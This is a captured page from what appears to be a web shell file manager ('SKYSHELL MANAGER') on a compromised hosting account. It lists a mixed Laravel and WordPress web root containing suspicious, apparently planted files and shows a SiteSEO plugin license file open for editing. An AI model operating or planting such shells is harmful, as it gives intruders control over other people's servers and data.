📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: license.php
<?php /* * SITESEO * https://siteseo.io * (c) SITSEO Team */ namespace SiteSEOPro\Settings; // Are we being accessed directly ? if(!defined('ABSPATH')){ die('Hacking Attempt !'); } // license page display class License{ static function template(){ global $siteseo; // Add header echo'<div id="siteseo-root">'; if(function_exists('siteseo_admin_header')){ siteseo_admin_header(); } if(isset($_REQUEST['save_siteseo_pro_license'])){ self::save(); } echo '<div class="siteseo-license-tab"> <div class="siteseopro-setting-content"> <div class="siteseopro-tab-group"> <table class="wp-list-table fixed striped users siteseopro-license-table" cellspacing="1" border="0" width="78%" cellpadding="10" align="center"> <tbody> <tr> <th align="left" width="25%">' . esc_html__('Siteseo Version', 'siteseo-pro') . '</th> <td>' . (defined('SITESEO_PRO_VERSION') ? esc_html(SITESEO_PRO_VERSION) . ' (Pro Version)' : 'N/A') . '</td> </tr> <tr> <th align="left" valign="top">' . esc_html__('Siteseo License', 'siteseo-pro') . '</th> <td align="left"> <form method="post" action=""> <span style="color:red">' . (defined('SITESEO_PRO_VERSION') && empty($siteseo->license['active']) ? '<span style="color:red">Unlicensed</span> ' : '') . '</span> <input type="hidden" name="siteseo_pro_license_nonce" value="' . wp_create_nonce('siteseo_pro_license') . '"/> <input type="text" name="siteseo_pro_license" value="' . (empty($siteseo->license['license']) ? (empty($_POST['siteseo_pro_license']) ? '' : esc_html($_POST['siteseo_pro_license'])) : esc_html($siteseo->license['license'])) . '" size="30" placeholder="e.g. SITESEO-11111-22222-33333-44444" style="width:300px;"> <br><br><input name="save_siteseo_pro_license" class="siteseopro-btn siteseopro-btn-primary" value="Update License" type="submit"> </form>'; if(!empty($siteseo->license)){ $expires = $siteseo->license['expires']; $expires = substr($expires, 0, 4) . '/' . substr($expires, 4, 2) . '/' . substr($expires, 6); echo '<div style="margin-top:10px;">License Status : ' . (empty($siteseo->license['status_txt']) ? 'N.A.' : wp_kses_post($siteseo->license['status_txt'])) . ' ' . ($siteseo->license['expires'] <= gmdate('Ymd') ? 'License Expires : <span style="color:red">' . esc_attr($expires) . '</span>' : (empty($siteseo->license['has_plid']) ? 'License Expires : ' . esc_html($expires) : '')) . '</div>'; } echo '</td> </tr> <tr> <th align="left">URL</th> <td>' . esc_url(get_site_url()) . '</td> </tr> <tr> <th align="left">Path</th> <td>' . esc_html(ABSPATH) . '</td> </tr> <tr> <th align="left">Server\'s IP Address</th> <td>' . esc_html($_SERVER['SERVER_ADDR']) . '</td> </tr> <tr> <th align="left">.htaccess is writable</th> <td>' . (is_writable(ABSPATH . '.htaccess') ? '<span style="color:red">Yes</span>' : '<span style="color:green">No</span>') . '</td> </tr> </tbody> </table> </div> </div> </div> </div>'; } static function save(){ global $siteseo, $lic_resp; if(!wp_verify_nonce($_POST['siteseo_pro_license_nonce'], 'siteseo_pro_license')){ echo '<div class="notice notice-error is-dismissible"><p>'; echo esc_html__('Security Check Failed', 'siteseo-pro'); echo '</p></div>'; return; } $license = sanitize_text_field(wp_unslash($_POST['siteseo_pro_license'])); if(empty($license)){ echo '<div style="margin-top:65px;" class="notice notice-error is-dismissible"><p>'; echo esc_html__('The license key was not submitted', 'siteseo-pro'); echo '</p></div>'; return; } siteseo_pro_load_license($license); if(is_wp_error($lic_resp) || 200 !== wp_remote_retrieve_response_code($lic_resp)){ if(is_wp_error($lic_resp)){ echo '<div style="margin-top:65px;" class="notice notice-error is-dismissible"><p>'; echo esc_html($lic_resp->get_error_message()); echo '</p></div>'; return; } else{ echo '<div style="margin-top:65px;" class="notice notice-error is-dismissible"><p>'; echo esc_html__('An error occurred, please try again. Response code: ', 'siteseo-pro') . esc_attr(wp_remote_retrieve_response_code($lic_resp)); echo '</p></div>'; return; } } else { $tmp = json_decode(wp_remote_retrieve_body($lic_resp), true); if(empty($tmp)){ echo '<div style="margin-top:65px;" class="notice notice-error is-dismissible"><p>'; echo esc_html__('The license key is invalid', 'siteseo-pro'); echo '</p></div>'; return; } echo'<div class="siteseo-notice is-success"> <p>'. esc_html__('Your license has been successfully activated!', 'siteseo-pro').' </p> </div>'; } } }
Save